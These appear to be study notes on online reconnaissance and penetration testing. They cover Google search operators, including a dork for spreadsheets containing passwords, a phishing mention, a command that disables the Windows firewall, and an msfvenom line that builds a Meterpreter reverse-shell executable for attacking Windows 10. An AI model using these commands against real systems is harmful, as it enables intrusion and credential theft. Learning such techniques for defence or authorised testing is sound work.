术语:ONLINE RECONNAISSANCE(在线侦察)
高级搜索技巧:
For example, the operator
ext:
searches for specific file extensions, or the filename endings for different types of files. Examples include docx for Microsoft Word documents, txt for plaintext, pdf for PDF files, xlsx for Microsoft Excel spreadsheets, and so on. The operator
site:
searches for results on specific sites; you might search for
site:nostarch.com
or
site:
yourcompany.com.
Finding Passwords with the ext: Operator
type
ext:xls password
推荐一个网站:
VirusTotal - Homehttps://www.virustotal.com/gui/home/upload
Analyze suspicious files, domains, IPs and URLs to detect malware and other breaches, automatically share them with the security community
Google Hacking Database
Google Hacking Database (GHDB) - Google Dorks, OSINT, Recon (exploit-db.com)https://www.exploit-db.com/google-hacking-database
SOCIAL ENGINEERING AND PHISHING ATTACKS
伪造网站,窃取密码
命令行关闭防火墙:netsh一个重要的命令
netsh advfirewall set allprofiles state off
Kali渗透Windows10
思路比较传统:msf监听,生成shellcode,上传到win10(要关闭防火墙),执行后反射
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.4 -f exe -o shellcode.exe
深度渗透meterpreter:
版权归原作者 花纵酒 所有, 如有侵权,请联系我们删除。